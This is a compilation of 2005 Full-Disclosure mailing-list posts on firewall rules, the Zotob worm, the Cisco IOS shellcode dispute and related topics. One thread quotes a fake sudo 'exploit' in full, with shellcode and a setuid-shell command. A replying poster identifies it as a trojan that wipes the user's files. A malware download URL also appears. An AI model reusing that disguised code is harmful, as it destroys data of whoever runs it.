> the hash entry expires.
>
> An example pulled from the web:
> iptables -A INPUT -m hashlimit -m tcp -p tcp --dport 22 --hashlimit \
> 1/min --hashlimit-mode srcip --hashlimit-name ssh -m state \ --state NEW
> -j ACCEPT
>
> https://www.redhat.com/archives/fedora-test-list/2005-August/msg00061.ht
> ml
> http://tinyurl.com/94fak
>
> Also, don't forget to man iptables or iptables -m hashlimit -h
>
> -miah
>
> On Fri, Sep 02, 2005 at 07:33:02PM +0800, Michael L Benjamin wrote:
> >
> >
> > -Original Message-
> > From: [EMAIL PROTECTED]
> > [mailto:[EMAIL PROTECTED] On Behalf Of Pedro
> > Hugo
> > Sent: Friday, 2 September 2005 05:53 PM
> > To: full-disclosure@lists.grok.org.uk
> > Subject: Re: [Full-disclosure] SSH Bruteforce blocking script
> >
> > Hi,
> >
> > >I don't want to debate the goodness or badness of the strategy of
> > >blocking hosts like this in /etc/hosts.deny. It works perfectly for
> > >me, and most likely would for you, so no religious debates thanks.
> > >It's effective at blocking bruteforce attacks. If a host EXCEEDS a
> > >specified number of guesses during the (configurable) 30 seconds it
> > >takes the script to cycle, the host is blacklisted.
> > >
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

-- 
"Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back." --B.B. King
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] RE: Example firewall script

[Ron DuFresne]

http://www.ranum.com/security/computer_security/papers/a1-firewall/




Thanks,

Ron DuFresne



On Sat, 27 Aug 2005, [EMAIL PROTECTED] wrote:

>
> 
>
> =
> ORIGINAL MESSAGE:
> -
> Date: Sat, 27 Aug 2005
> From: "Exibar"
> Subject: Example firewall script
>
> >The absolute worse Firewal rule
> >you can have:
> >
> > Allow ANY ANY
> >
> >The best:
> >
> >  Deny ANY ANY
> =
>
> REPLY:
> ---
>
> Actually, that's not true.
> I would agree that as a general rule of thumb
> you should have a deny statement at the end
> of every ACL. In fact, Cisco places an implicit
> DENY ANY ANY at the end of their ACL's
> automatically.
>
> However, Access Control Lists are not firewalls.
> Yes, we use them as firewalls, but that's not what
> they are.
>
> ACL's ARE TRAFFIC SHAPING DEVICES.
>
> As traffic shaping devices, they can be used for
> security, but they are also used for management
> purposes. For instance; many Autonomous Systems
> are multi-homed. There are decisions to be made
> about how traffic will flow in and out of the AS.
> You also have to decide if you wish to be a
> transit AS or not.
>
> ACLs are the tool that you use to control your
> traffic.
>
> While an ACL being used as a security device
> should have a deny statement at the end, proper
> construction of the ACL is more about following
> the proper construction rules.
>
> This is actually a huge subject, far too big
> for an individual e-mail to a list.
>
> But there are some basic rules to keep in mind:
>
> ACL's analyze traffic from top to bottom, so
> keep your most specific entries at the top,
> with more general entries near the bottom;
> and do your "permits" before your "denys".
> That means you deal with hosts first, then
> subnets, then  networks, and at each level
> you have your permit statements  before your
> deny statements. The reason for this is because
> once a packet matches a line, it's dealt with
> right then and there. You don't want to have
> a packet thrown away just before a line that
> would have permitted it.
>
> There are also issues of what KIND of ACL to
> use and where  to place them; Inbound or Outbound.
>
> In terms of the original question, the only
> difference between a "good" line item or a
> "bad" line item is whether or not the syntax
> is correct.
>
> The only difference between a "good" ACL
> and a "bad" ACL is  whether or not it's
> structure is properly designed and whether
> or not it's placed in the proper location.
>
>
> This subject REALLY calls for a book, not
> an e-mail response. I've said very little
> in this post and look at all the room
> it took up.
>
> ++
>
> 
> mail2web - Check your email from the web at
> http://mail2web.com/ .
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

-- 
"Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back." --B.B. King
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] anybody remember the name of this tool

[Ron]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

ngrep and netsed are useful.

[EMAIL PROTECTED] wrote:
> Hi all,
> 
> I forget the name of a tool that can be used to intercept TCP packet and
> allow you to modify the packet before it was
> sent out. Basically the tool open 2 ports, one for listening and one for
> sending, it allows you to watch and modify
> packets in and out. It is like a port forwarding tool with a packet
> modifying feature (support editting on both side receive and sending).
>  I remember the tool run on Windows and have a nice GUI with hex editor.
> It has been a while for me since the last time using such tool,
> i cannot remember the name of it. Google doesn't yeild the right result
> and it is not netsed which is commandline and *Nix based.
> I hope some of us here can remember the tool name.
> 
> Thanks
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
> 
> 
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.9.15 (GNU/Linux)
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org

iD8DBQFDDNMefqSf2EkP4p4RAtJhAJ4rNpbgfyTAg1Y2wwicdg8mBWOqIgCfWVGT
VyUwmtIZmFTucTenY52Ez3A=
=RX4F
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Problems with unsuscribing

[Ron DuFresne]

additional hint:  the headers for e-mails can be as vauable as the source
code of the application.


Thanks,

Ron DuFresne


On Tue, 23 Aug 2005, Justin Allen wrote:

> Well for one, it would help if you were unsubscribing to the correct list
>
> Suetterlin, Sven wrote:
>
> > Hi @ all,
> >
> >
> >
> > in order from my boss, I have to unsubscribe from this list. I've send
> > an Email to [EMAIL PROTECTED]
> > <mailto:[EMAIL PROTECTED]> and the address
> > in the ``List-Unsubscribe'' header of any list message. But nothing
> > happen, I didn't get an confirm message, but I still receive messages
> > from bugtraq. I've also tried to visited the subscription page, but I
> > still get an "the page cannot be displayed" error. Could anyone help me?
> >
> >
> >
> > Best regards
> >
> >
> >
> > Sven Sütterlin
> >
> >
> >
> > *DTS Medien AG*
> >
> > Heidestraße 38
> >
> > D-32051 Herford
> >
> >
> >
> > Fon: +49 (0) 5221 101-1092
> >
> > Fax: +49 (0) 5221 101-2001
> >
> > eMail:   [EMAIL PROTECTED] <mailto:[EMAIL PROTECTED]>_
> >
> > Web:_www.dts-medien.de <http://www.dts-medien.de/>__ _
> >
> > *ISY**_3 * */  /**/Die Software für Mediendaten/**/.
> > /*www.isy3.com <http://www.isy3.com>
> >
> >
> >
> >
> >
> >___
> >Full-Disclosure - We believe in it.
> >Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> >Hosted and sponsored by Secunia - http://secunia.com/
> >
>
>

-- 
"Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back." --B.B. King
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

RE: [Full-disclosure] Zotob Worm Remover

[Ron DuFresne]

Which is a strong argument for zones, internally a zoned FW structure also
handles this issue as well.  A single chokepoint is not longer effective
for any org or any decent size.  Now layout your network like a bullseye
and each layer is a zone that requires tighter and tighter contratints to
reach the softer chewer cernter.

Patching is a no end no gain issue, when there are weekly sploits released
to deal with a monthly patch release that takes gawd knows how many days
or weeks for various companies to test prior to pushing into production.

Patch managemtn has earned many a lot of bucks, and will continue to line
many pockets for a long time as folks play into the latest and greatest
buzzword of the week/month/year, but when it comes to security, a little
extrapolation of the basics is the real key to any small sense of secure.

Thanks,

Ron DuFresne

On Mon, 22 Aug 2005, Todd Towles wrote:

> This is correct for the first day, maybe two. Then unpatched laptops
> leave the corporate network, hit the internet outside the firewall and
> then bring the worm back right to the heart of the network the very next
> day, bypassing the firewall all together. Firewall is just one step..it
> isn't a solve all. Patching would be the only way to stop this threat in
> all vectors. That was my point.
>
> If you aren't blocking 445 on the border of your network, you have must
> worse problems with Zotob.
>
> > -Original Message-
> > From: Ron DuFresne [mailto:[EMAIL PROTECTED]
> > Sent: Monday, August 22, 2005 3:15 PM
> > To: Todd Towles
> > Cc: n3td3v; full-disclosure@lists.grok.org.uk
> > Subject: RE: [Full-disclosure] Zotob Worm Remover
> >
> > On Mon, 22 Aug 2005, Todd Towles wrote:
> >
> > > Wireless really isn't a issue. You can get a worm from a
> > cat 5 as easy
> > > as you can from wireless. The problem was they weren't patched. Why
> > > weren't they patched? Perhaps Change policy slowed them
> > down, perhaps
> > > it was the fear of broken programs..perhaps it was the QA group..it
> > > doesn't really matter. They go the worm because they were
> > not patched.
> >
> > And because they didn't properly filter port 445 is my understanding.
> > Unpatched systems behind FW's that fliter 445 were untouched.
> >
> > Thanks,
> >
> > Ron DuFresne
> > --
> > "Sometimes you get the blues because your baby leaves you.
> > Sometimes you get'em 'cause she comes back." --B.B. King
> > ***testing, only testing, and damn good at it too!***
> >
> > OK, so you're a Ph.D.  Just don't touch anything.
> >
> >
> >
>

-- 
"Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back." --B.B. King
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

RE: [Full-disclosure] Zotob Worm Remover

[Ron DuFresne]

On Mon, 22 Aug 2005, Todd Towles wrote:

> Wireless really isn't a issue. You can get a worm from a cat 5 as easy
> as you can from wireless. The problem was they weren't patched. Why
> weren't they patched? Perhaps Change policy slowed them down, perhaps it
> was the fear of broken programs..perhaps it was the QA group..it doesn't
> really matter. They go the worm because they were not patched.

And because they didn't properly filter port 445 is my understanding.
Unpatched systems behind FW's that fliter 445 were untouched.

Thanks,

Ron DuFresne
-- 
"Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back." --B.B. King
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: It's not that simple... [Was: Re: [Full-disclosure] Disney Down?]

[Ron DuFresne]

On Fri, 19 Aug 2005, Nick FitzGerald wrote:

> [EMAIL PROTECTED] to Ron DuFresne:
>
> > > Perhaps it does realte considering the above and considering that the unix
> > > world learned many of the evils of RCP services over ten years ago that
> > > seem to hit the M$ realm every few months, repeatedly...
> >
> > We used to call them rsploits when it was common in unix.  Friends and I
> > had a good chuckle when MS started repeating history, having rsploits of
> > its own.  I would love to deny all port 445 with layer-3 switches but this
> > would be like blocking portmap and expecting NFS to still mount.
> >
> > What have we learned from the past that we can apply to our MS networks,
> > since they have become a (un)necessary evil?  How neutered does an MS
> > workstation become if the RPC port is completely blocked from the outside?
> > Perhaps "mostly harmless" ?
> >
> > What would it take to write an RPC filter to only accept RPCs which we
> > actually care about?  In addition, why is PnP even an RPC accessible from
> > the outside (no, upnp is not a good reason)!?  Most importantly, we need
> > to eliminate the entire RPC attack vector in the future for Microsoft
> > systems -- this is not the first MS rsploit and we will certainly see
> > more.
>
> Why don't folk -- well, sys-admins anyway -- actually take the time to
> bother to learn what their systems do and how they work???
>


Ahh, but this is not an admin issue, it's the vendors issue.  Was similar
for sometime with SUNOS, when trying to disable RPC for production systems
one used to have to twist around sideways while tring to bend over
backwards.  Not the same these days now that SUN has learned the lesson
that M$ is re-propogating with thier "we'll do it our way, screw learning
via others lessons or sticking to standards".  Redmond has been bitten by
these issues in the past few years a number of times and will be bitten
again till they finally learn what took other vendors awhile to get the
point on as well.


[REST SNIPPED]


Thanks,

Ron DuFresne
-- 
"Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back." --B.B. King
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: It's not that simple... [Was: Re: [Full-disclosure] Disney Down?]

[Ron DuFresne]

On Wed, 17 Aug 2005, Micheal Espinola Jr wrote:

> >From my perspective, developing a patch and applying a patch are two
> different life cycles.  I'm no developer, but I know what it takes to
> properly test and roll-out patches within my (current and previous)
> organization(s).
>
> I don't pretend to believe that all patches are the same, but this PnP
> patch is one of the less difficult to deal with in terms of a
> roll-out.  I truly believe this recent worm could have been avoided if
> MS05-039 was taken more seriously.

Isn't this like the second or third time M$ has been bitten by pnp within
the past say two to three years?  So, is this an example of the M$
tendency to not fully patch the affected system/service, but to only
address a "current" potential which has been a thing that's bitten them in
the past many many times as well?


>
> I cannot say as to why MS hasn't addressed any other outstanding
> issues.  While it's a valid concern of mine as well, it really doesn't
> relate to the discussion regarding the MS05-039 fiasco.
>


Perhaps it does realte considering the above and considering that the unix
world learned many of the evils of RCP services over ten years ago that
seem to hit the M$ realm every few months, repeatedly...


Thanks,

Ron DuFresne
-- 
"Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back." --B.B. King
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: It's not that simple... [Was: Re: [Full-disclosure] Disney Down?]

[Ron DuFresne]

[SNIP]

>
> Greg Smith, the county's assessor, recorder and clerk, said "As long
> as we're up (today), we'll be fine"  Greg Smith is a thinking much too
> lightly of the situation.  Their systems just got hit with an exploit
> that allows for remote code execution and elevation of privilege.  If
> I was him, I would be very concerned about data theft, and performing
> network wide audits.
>
> "Yesterday's crash marked the third time in recent weeks that
> significant computer problems have affected county government."  Well,
> enough said about Greg Smith or whoever manages SDC's systems...
>
> Lets take a look at the ISS advisory that makes a respectful analysis
> of the phrase "code execution and elevation of privilege":
>
> "Successful exploitation of this vulnerability could be leveraged to
> gain complete control over target systems, and might lead to malware
> installation, exposure of confidential information, or further network
> compromise. Due to the widespread use of the affected operating
> systems and the critical nature of component affected, it is likely
> that servers and desktops used for a wide variety of purposes are
> vulnerable to this issue."
>
> The initial exploited fault aside, I see no excuse for this.
>
>


Of course you are correct, there is NO excuse for this in any setting,
yet, considering the past ten years of GAO audits and advisories on the
federal side of gvt systems, what makes one think that state and local
county govs would have any better standing?  Part of the problemsis that
govs wish to pay nothing and get everything in return, and are extremely
poor in fetting out raises and tend to pull back emenesly on the benfit
packages, if one can really lable them such.  So, they tend to get "what
they pay for", which in the case of the gov site I work under, is a bunch
of certified idiots that lack the skills to do what they have been tasked
to do.  Their vested interst lies in a "proper pulic presentation,
meaning they don't hire folks that lack a suit and tie, and thus have
missed out in recruiting into their realm persons with the skills to
actually make a difference, if not for the folllowing:  Not to mention
that no one wishes to take responsibility, for that might also task then
to accountability.  I can tell you for a fact that since our unskilled
sec folks where I work won;t go "outside the border"  to discover vulln
info that they did not get a clue about the recent trojan till far after
the fact that many sites had been hit by it.  In fact their announcemnt
came out this AM, from their multi-state vuln/sploit notification council...

There is no excuse for doing below minimum and little excuse for scrapping
along at minimum, with taxpayers footing the bill, but that's life in gov
settings and more so perhaps in state and county govs that lack the
auditing controls like the GAO 


Thanks,


Ron DuFresne
-- 
"Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back." --B.B. King
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] What is this

[Ron]

I've seen something very similar spreading as an IM worm.  There's  a
pretty good chance he got it from AIM or MSN.  Of course, it could also
be a classic email worm, who knows?

Michael Hale wrote:
> Anti virus doesn't detect it because its packed with ASProtect 1.2.x
> (using StudPE). You can see the difference when it's dumped out of RAM
> into it's uncompressed/decrypted form (see VirusTotal results below).
> My interest is where you came across this URL. Can you provide that
> information?
> 
> Scan results
>  File: DUMPED.php
>  Date: 08/08/2005 20:39:56 (CET)
> 
> AntiVir 6.31.1.0/20050808   found [BDS/SdBot.Gen.Plus]
> Avast   4.6.695.0/20050808  found nothing
> AVG 718/20050807found nothing
> Avira   6.31.1.0/20050808   found [BDS/SdBot.Gen.Plus]
> BitDefender 7.0/20050808found nothing
> CAT-QuickHeal   7.03/20050808   found [(Suspicious) - DNAScan]
> ClamAV  devel-20050725/20050808 found [Trojan.Mybot-312]
> DrWeb   4.32b/20050808  found [BackDoor.IRC.Sdbot.118]
> eTrust-Iris 7.1.194.0/20050806  found nothing
> eTrust-Vet  11.9.1.0/20050808   found [Win32.Slinbot]
> Fortinet2.36.0.0/20050808   found [suspicious]
> F-Prot  3.16c/20050808  found nothing
> Ikarus  0.2.59.0/20050808   found nothing
> Kaspersky   4.0.2.24/20050808   found nothing
> McAfee  4552/20050808   found [New Malware.b]
> NOD32v2 1.1187/20050805 found [BAT/NoShare.L]
> Norman  5.70.10/20050805found nothing
> Panda   8.02.00/20050808found nothing
> Sophos  3.96.0/20050808 found nothing
> Sybari  7.5.1314/20050808   found [Win32.Slinbot]
> Symantec8.0/20050808found [W32.Randex]
> TheHacker   5.8.2.082/20050808  found nothing
> VBA32   3.10.4/20050808 found [suspected of Backdoor.RxBot.2]
> 
> On 8/8/05, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote:
> 
>>Quoting Armando Rogerio Brandão Guimaraes Junior <[EMAIL PROTECTED]>:
>>
>>
>>>Somebody know what fuck is this? http://www.pokersverige.se/IMAGE0004.php
>>>AntiVirus and SpyBot doesn´t detect!!!
>>>
>>>Armando Guimarães Jr
>>
>>It is an MS-EXE executable program.  Anti virus doesn't find it because
>>it is not an virus.  Spybot for the same reason.  To block these you
>>need an smtp policy that does not allow executable attachments to
>>incoming emails.
>>
>>"What it does" could be anything from typing "hello world" in a dialog
>>box (unlikely) to creating a new Administrator account on your
>>corporate AD server and posting the entire contents thereof to an IRC
>>channel (somewhat more likely).  But at first glance it looks like it
>>is going to open a backdoor shell on the recipient's PC.
>>
>>tc
>>
>>
>>
>>
>>This message was sent using IMP, the Internet Messaging Program.
>>
>>___
>>Full-Disclosure - We believe in it.
>>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>Hosted and sponsored by Secunia - http://secunia.com/
>>
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
> 
> 
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Cisco IOS Shellcode Presentation

[Ron DuFresne]

On Mon, 1 Aug 2005, John Kinsella wrote:

> Hate having to explain a joke, but...
>

perhaps it wasn't tainted eith enough irony or cynasim and sarcasim?


Thanks,

Ron DuFresne
-- 
"Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back." --B.B. King
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Undisclosed Sudo Vulnerability ?

[Ron]

Haha nice, I was just getting ready to run it on my sacrificial VMWare
box, but you saved me the trouble of hitting "undo" :-)

Kurt Seifried wrote:
> This is a trojan that will nuke all the files owned by the user running it.
> 
> -Kurt
> 
> - Original Message - From: "Esler, Joel - Contractor"
> <[EMAIL PROTECTED]>
> To: 
> Sent: Saturday, July 30, 2005 12:40 PM
> Subject: [Full-disclosure] Undisclosed Sudo Vulnerability ?
> 
> 
>> About two weeks ago, our proprietary LIDS detected some suspicious shell
>> activity on an internal .mil machine i am in charged of. Our server runs
>> latest up2date Debian GNU/Linux on 2.4.31 x86 with grsec/PaX enabled.
>> Before shutting down the machine and reinstalling it from scratch, we
>> installed sebek module to monitor all shell activity. Based on the data
>> we gathered, it seems the attacker gained root privileges using an
>> undisclosed bug in latest sudo.
>>
>> $ uname -a
>> Linux syslog 2.4.31-grsec #1 SMP Tue Jun 21 09:10:06 EDT 2005 i686
>> GNU/Linux
>>
>> $ sudo -V
>> Sudo version 1.6.8p9
>>
>> $ ls -al /tmp/.phc
>> -rwsr-xr-x  1 root root 304873 Jul 05 03:45 /tmp/.phc
>>
>> Here is an excerpt of a shell session we recorded:
>>
>> <.>
>> $ cat >blaat.uue<<'EH'
>>
> 
> 
> 
> 
> 
> 
>> EH
>> $ uudecode blaat.uue
>> $ cat sudoh.c
>> /*
>> *  off by one ebp overwrite in sudo prompt parsing func (bground mode
>> only)
>> *
>> *  "y0, don't abuse this priv8 exploit to rm boxes. k,thx" - Richard
>> Johnson
>> *
>> *  gcc -pipe -o sudoh sudoh.c ; ./sudoh
>> *
>> *  happy deathday route
>> *
>> */
>>
>> #include 
>> #include 
>> #include 
>> #include 
>>
>>
>> #define SUDO_PROMPT "[EMAIL PROTECTED]> \\%"
>> #define shellcode   esp
>> #define RETS_NUM246 /* generic */
>> #define NOPS_NUM116 /* generic */
>>
>>
>> /*
>> *  Linux x86 non-interactive exec
>> *  {0,1,2} fds are closed upon execution of shellcode (use "/bin/sh -c")
>> */
>>
>> char esp[] __attribute__ ((section(".text"))) /* e.s.p release */
>>= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
>>  "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
>>  "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
>>  "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
>>  "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
>>  "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
>>  "\x6e\x2f\x73\x68\x00\x2d\x63\x00"
>>  "cp -p /bin/sh /tmp/.phc; chmod 4755 /tmp/.phc;";
>> /* = "\xcc\xeb\xfe"; */
>>
>>
>>
>> void fill (char *buff, int size, unsigned long val)
>> {
>>unsigned long *ptr = (unsigned long *) buff;
>>
>>for (size /= sizeof (unsigned long); size > 0; size--) *ptr++ =
>> val;
>> }
>>
>>
>> unsigned long get_sp (void)
>> {
>>__asm__ ("lea esp, %eax");
>> }
>>
>>
>> char *th30_iz_own3d (char nops_nums, char rets_nums, char *shellcode)
>> {
>>int size = strlen (SUDO_PROMPT) + nops_nums + rets_nums +
>> strlen (shellcode);
>>unsigned char *nops = alloca (nops_nums);
>>unsigned char *rets = alloca (rets_nums);
>>unsigned long ret = get_sp ();
>>static char exp_buffer [8192];
>>
>>/* make sure sudo isatty() fails */
>>close (0); close (1); close (2);
>>
>>fill (nops, (unsigned char) nops_nums, 0x90909090);
>>fill (rets, (unsigned char) rets_nums, ret);
>>
>>/* be nice plz */
>>if (size > sizeof (exp_buffer)) {
>>fprintf (stderr, "buffer's t00 small..\n");
>>return NULL;
>>}
>>
>>snprintf (exp_buffer, sizeof (exp_buffer), "%s%s%s%s",
>>  SUDO_PROMPT, /* evilz prompt */
>>  nops,
>>  shellcode,
>>  rets);
>>
>>/* exploit buff */
>>return exp_buffer;
>> }
>>
>>
>>
>> int main(int argv, char *argc[])
>> {
>>char *exploit = th30_iz_own3d (NOPS_NUM, RETS_NUM, shellcode);
>>
>>/* thanks again T0dd :) */
>>
>>execl ("/usr/bin/sudo", "/usr/bin/sudo", "-b", "-p", exploit,
>> "/bin/false", NULL);
>>
>>/* ok, shellroot should await you @ "HISTFILE=/dev/null
>> /tmp/.phc -p" */
>>
>>return 0;
>> }
>>
>> $ gcc -pipe -o sudoh sudoh.c
>> {standard input}: Assembler messages:
>> {standard input}:5: Warning: Ignoring changed section attributes for
>> .text
>> $ ./sudoh
>> $ cat /bin/cat > blaat.uue; rm blaat.uue
>> $ cat /bin/cat > sudoh.c; rm sudoh.c
>> $ cat /bin/cat > sudoh; rm sudoh
>> $ HISTFILE=/dev/null /tmp/.phc -p
>> id
>> uid=65534(nobody) gid=65534(nobody) euid=0(root) groups=65534(nobody)
>> <.>
>>
>>
>> Todd Miller, the maintainer of Sudo has been informed yesterday, and it
>> is strongly advised to "sudo su -c chmod -s sudo" until a patch is out.
>>
>>
>> J
>>
>> Joel Esler, GCIA
>>

Re: [Full-disclosure] Cisco IOS Shellcode Presentation

[Ron DuFresne]

On Sat, 30 Jul 2005, Micheal Espinola Jr wrote:

> It was Lynn's choice based on his statement to the press - and it was
> still his choice no matter what the coercion might have been.
>
> Larry had no right to take take that choice away, and I doubt anyone
> here has the right nor the first-hand knowledge in order to pass
> judgement on the reasons for Lynn's choice.
>
> Based on Lynn's statements his motivation was patriotic.  Who are we
> to judge that was not his intent for his intellectual property?
>


I made no judgement about Lynn or the choices he may or may have made of
his own free will, did I?  If so where did I make such judgements  in my
post?  I merely questioned how "free" his choices were after deciding that
his employer was not going to stop him from pushing this information to
the masses.  Seems to me that his "freely" made recent choices were
influenced, I think that is easy to read into the events as they have
progressed, do you not also?


> I ask you, how do you know it wasn't?
>





Thanks,

Ron DuFresne

> On 7/29/05, Ron DuFresne <[EMAIL PROTECTED]> wrote:
> > On Fri, 29 Jul 2005, Micheal Espinola Jr wrote:
> >
> > > That was a real dickhead thing to do.  The guy that wrote that made an
> > > agreement with Cisco of his own free will.  Who do you think you are
> > > to go against an agreement he made, with his own information?
> > >
> > > I sincerely hope it bites you in the arse.
> > >
> >
> > Was it free will, or the threat of jail and other difficulties?
> >
> > Afterall, employment was not a show stopper for him, he quit to release
> > his findings and gain glory in the crowds at hacker fests.  so was it
> > really free will I ask again?
> >
> > Thanks,
> >
> > Ron DuFresne
> > --
> > "Sometimes you get the blues because your baby leaves you. Sometimes you 
> > get'em
> > 'cause she comes back." --B.B. King
> >***testing, only testing, and damn good at it too!***
> >
> > OK, so you're a Ph.D.  Just don't touch anything.
> >
> >
> >
>
>
>

-- 
"Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back." --B.B. King
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Cisco IOS Shellcode Presentation

[Ron DuFresne]

On Fri, 29 Jul 2005 [EMAIL PROTECTED] wrote:

> On Fri, 29 Jul 2005 16:38:26 CDT, Ron DuFresne said:
>
> > being that we'll all be retired and all this equipment replaced by the
> > time IPv6 becomes standard the threat is not as great then as it was first
> > made out to be then, correct?
>
> Part of the problem is that IOS includes IPv6 support by default.
>
> How many sites that don't do IPv6 didn't do a 'no ipv6 enable' and 'no ipv6
> address' on *every* interface?
>

IPv6 has been hyped as the security shim of all shims for tcp/IP.  Even
able to cure the common cold, if implimented prior to mass
rollout/acceptance.  Which is why we are seeing many security admins on
various platforms not paying attention to security 101 tenants, if it's
not needed disable/remove it.

I'm gessing now that many in the *nix as well as router realms will now
pay a tad more heed to the basics?


Thanks,

Ron DuFresne
-- 
"Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back." --B.B. King
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Cisco IOS Shellcode Presentation

[Ron DuFresne]

On Fri, 29 Jul 2005, Jason Coombs wrote:

> Madison, Marc wrote:
> >  Am I missing something here, because it seems that two vulnerabilities
> > are being discussed, one is the IPv6 DOS
> > http://www.cisco.com/warp/public/707/cisco-sa-20050729-ipv6.shtml.  And
> > the other is Lynn presentation on shellcode execution via the IOS?
>
> Did you read the advisory? It is not solely a DoS threat.
>
> "Cisco Internetwork Operating System (IOS ) Software is vulnerable to a
> Denial of Service (DoS) and potentially an arbitrary code execution
> attack from a specifically crafted IPv6 packet."

being that we'll all be retired and all this equipment replaced by the
time IPv6 becomes standard the threat is not as great then as it was first
made out to be then, correct?





Thanks,

Ron DuFresne


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Cisco IOS Shellcode Presentation

[Ron DuFresne]

On Fri, 29 Jul 2005, KF (lists) wrote:

> Trying to Stifle information is a real dickhead thing to do also...
>
> I'm just waiting for someone to toss the DMCA into all of this. =]


CERT and DHS are bigger cards in the game then DMCA.


Thanks,

Ron DuFresne
-- 
"Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back." --B.B. King
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Cisco IOS Shellcode Presentation

[Ron DuFresne]

On Fri, 29 Jul 2005, Micheal Espinola Jr wrote:

> That was a real dickhead thing to do.  The guy that wrote that made an
